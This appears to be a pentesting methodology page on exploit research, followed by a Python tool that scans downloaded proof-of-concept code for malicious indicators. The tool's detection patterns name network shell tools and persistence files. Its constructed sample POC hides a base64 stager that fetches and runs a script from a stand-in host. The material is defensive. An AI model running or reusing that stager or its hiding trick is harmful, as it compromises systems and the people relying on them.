# Exploit Research

This phase is critical and is more difficult than it may seem. You should have a plan when you approach this phase of the engagement. What are your hypotheses? What is your objective? What are the obstacles in your way?

During the Information Gathering phase, you should have created a list of things to try or research. Prioritize that list so that the highest-priority item is the one you believe will produce the most fruit given where you are and what you are trying to accomplish.

During this phase you should do a code review on any exploit or POC code that you intend to use. Ideally, you want to know **exactly** what the code does before you run it. Not only could it be malicious, but knowing what the exploit is trying to do can also keep you from wasting time on a script that simply does not work.

There will be times when the code is over your head. When this happens, do your best to understand, at a high level at least, what the exploit is and what is required for it to work.

This phase may go hand in hand with exploit development (modification) and exploit testing. As you are researching potential exploits in a prioritized order, you may want to test exploits that you come across that seem promising. With this in mind, do not spend too long on one just because it seems promising. Set a timer for 30 min to 1 hour before you move on, or at least take a break. It may be helpful to reflect back on what you know, what your assumptions (hypotheses) are, what your evidence is, how confident you are, and how you can test them.

## Methodology

* [ ] Use searchsploit or [Exploit-DB](https://exploit-db.com) to find potential exploits or information about exploiting a target. Do not ignore the papers, as they may provide critical information in helping you understand how the exploit works.
  * Make sure to look at all the services and check them for vulnerabilities.
* [ ] Use your favorite search engine to dig around more about the exploit(s) that have potential.
* [ ] Run one or more vulnerability scanners.

After you find a potential exploit, review the exploit code and learn what the exploit is and how it works.

Give yourself a window of time to test it.
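The code review step above (and the warning earlier on this page that a downloaded POC could itself be malicious) is easier to apply consistently with a small triage script that you run over the file before reading it by hand. The following is an added example, not code from the original page or from any project it mentions: the indicator patterns, the verdict tiers and the sample POC are all assumptions constructed for the demonstration. It flags shell execution, network calls, destructive and persistence-related calls, hard-coded hosts, and long base64 runs, and it decodes those runs and scans the decoded text too, so a stager hidden inside an encoded string is reported under the line that carries it.

```python
"""Static triage of a downloaded proof-of-concept before anyone runs it.

Added illustration, not from the original page. The indicator list, the
verdict tiers and SAMPLE_POC are constructed for the demonstration.
"""
import base64
import re
from collections import defaultdict

# Patterns a reviewer typically wants surfaced (assumed set; extend as needed).
INDICATORS = {
    "exec": re.compile(r"\b(os\.system|subprocess\.\w+|eval|exec)\s*\("),
    "network": re.compile(r"\b(socket\.socket|requests\.\w+|urllib|curl|wget|nc)\b"),
    "destructive": re.compile(r"(rm\s+-rf|shutil\.rmtree|os\.remove\()"),
    "persistence": re.compile(r"(crontab|\.bashrc|authorized_keys|rc\.local)"),
    "hardcoded_host": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b|https?://[^\s'\"]+"),
}
# Long base64-looking runs: decode them so the reviewer sees what is hidden.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")


def decode_blob(blob):
    """Return the decoded text of a base64 run, or None if it is not valid base64/UTF-8."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(source):
    """Scan POC source line by line. Returns {category: [(lineno, evidence), ...]}.

    Decoded base64 blobs are scanned again, so an indicator that only appears
    inside an encoded string is still reported (under the original line number).
    """
    findings = defaultdict(list)
    for lineno, line in enumerate(source.splitlines(), start=1):
        texts = [line]
        for blob in B64_BLOB.findall(line):
            decoded = decode_blob(blob)
            if decoded is not None:
                findings["encoded_payload"].append((lineno, decoded))
                texts.append(decoded)
        for text in texts:
            for name, pattern in INDICATORS.items():
                for m in pattern.finditer(text):
                    findings[name].append((lineno, m.group(0)))
    return dict(findings)


def review_verdict(findings):
    """Map findings to a reviewer verdict: 'no-indicators', 'read-carefully' or 'do-not-run'."""
    if findings.get("encoded_payload") or findings.get("destructive") or findings.get("persistence"):
        return "do-not-run"
    if findings.get("network") or findings.get("hardcoded_host") or findings.get("exec"):
        return "read-carefully"
    return "no-indicators"


# Constructed sample: a POC that does what it claims (sends an oversized buffer to
# the tester's chosen target) but also carries a planted, base64-hidden stager.
# The address is from the documentation range (RFC 5737), not a real host.
_PLANTED = base64.b64encode(b"wget http://203.0.113.5/update.sh -O- | sh").decode()
SAMPLE_POC = f'''\
#!/usr/bin/env python3
import sys, socket, base64, os
target = sys.argv[1]          # the host the tester points it at
payload = b"A" * 1024         # the overflow trigger the POC claims to send
s = socket.socket()
s.connect((target, 21))
s.send(payload)
# "compatibility check": in fact a planted stager, decoded at runtime
os.system(base64.b64decode("{_PLANTED}").decode())
'''

if __name__ == "__main__":
    report = triage(SAMPLE_POC)
    for category, hits in report.items():
        for lineno, evidence in hits:
            print(f"{category:16} line {lineno}: {evidence}")
    print("verdict:", review_verdict(report))
```

On the constructed sample the script reports the expected `socket.socket` call on line 5 as "network", then on line 9 the `os.system(` call, the decoded stager, its `wget` and the hard-coded URL, and returns `do-not-run`. A verdict is only a prompt for the manual review the page calls for, not a replacement: a POC with no indicators can still be wrong or harmful, and one with indicators may be perfectly legitimate (an exploit that opens a socket to the target is supposed to).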
